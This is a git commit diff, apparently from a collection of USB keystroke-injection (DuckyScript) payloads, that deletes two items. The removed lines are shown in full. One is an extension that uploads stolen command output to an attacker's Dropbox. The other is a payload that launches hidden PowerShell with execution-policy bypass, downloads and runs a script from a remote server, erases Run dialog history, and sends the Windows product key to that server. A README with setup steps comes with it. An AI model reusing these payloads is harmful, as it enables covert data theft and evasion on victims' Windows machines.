Remove 1 extension and 1 payload
- Remove "PowerShell To Dropbox" extension
- Remove "Windows Product Duckey" payload
pull/431/head
parent
bf2dfb7c17
commit
761a5fa08c
|
@ -1,25 +0,0 @@
|
|||
EXTENSION PowerShell_To_Dropbox
|
||||
|
||||
REM Title: PowerShell_To_Dropbox
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This DuckyScript extension exfiltrates data (for example the result of a command) from the target computer by submitting a file to your Dropbox.
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM For usage instructions look at https://github.com/Who-Is-Julien/Ducky-Utilities/blob/main/PowerShell_To_Dropbox/README.md
|
||||
|
||||
|
||||
DEFINE REFRESH_TOKEN XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
||||
DEFINE APP_KEY XXXXXXXXXXXXXXX
|
||||
DEFINE APP_SECRET XXXXXXXXXXXXXXX
|
||||
|
||||
STRING Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "
|
||||
STRING REFRESH_TOKEN
|
||||
STRING "; client_id = "
|
||||
STRING APP_KEY
|
||||
STRING "; client_secret = "
|
||||
STRING APP_SECRET
|
||||
STRING "}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body $report | Out-Null
|
||||
DELAY 500
|
||||
ENTER
|
||||
|
||||
END_EXTENSION
|
|
@ -1,34 +0,0 @@
|
|||
<h1 align="center">
|
||||
<a href="https://git.io/typing-svg">
|
||||
<img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Product+Duckey+🦆🔑">
|
||||
</a>
|
||||
</h1>
|
||||
|
||||
## Description
|
||||
|
||||
This payload exfiltrate the target's Windows product key to a remote server. *Only works on Windows 10,11.*
|
||||
|
||||
## Usage
|
||||
|
||||
### Setup
|
||||
|
||||
- Set up a website on your server or a computer in the same network as the target's computer. You can use Python to do this by running the following command:
|
||||
```
|
||||
python -m http.server 80
|
||||
```
|
||||
- Download the "payload.txt" and "script.ps1" files and modify them to include the IP address of your server.
|
||||
- Move the modified "script.ps1" file to the root directory of your website, so it is downloadable from this address:
|
||||
```
|
||||
http://<REMOTE_IP_ADDRESS>/script.ps1
|
||||
```
|
||||
|
||||
### Analysis
|
||||
|
||||
Once the payload is executed, you can find the target's IP address and Windows product key by checking your website logs.
|
||||
|
||||
|
||||
***Note**: This script is designed to send the results to a specific server, so you don't have to rely on any file sharing services. Additionally, you can easily adapt it to work with encrypted sites.*
|
||||
|
||||
---
|
||||
|
||||
*This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.*
|
|
@ -1,17 +0,0 @@
|
|||
REM Title: Windows Product Duckey
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This payload exfiltrate the target's Windows product key to a remote server.
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
DEFINE REMOTE_IP_ADDRESS 192.168.1.10
|
||||
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://
|
||||
STRING REMOTE_IP_ADDRESS
|
||||
STRING /script.ps1; iex $pl
|
||||
DELAY 500
|
||||
ENTER
|
|
@ -1,4 +0,0 @@
|
|||
#Replace <REMOTE_IP_ADDRESS> with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-WebRequest -Uri "http://<REMOTE_IP_ADDRESS>?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
|
|
@ -1,8 +0,0 @@
|
|||
#Replace <REMOTE_IP_ADDRESS> with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
#Clear windows run dialog history
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||
|
||||
#Retrieve and send the computer's original product key to a remote server
|
||||
Invoke-WebRequest -Uri "http://<REMOTE_IP_ADDRESS>?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
|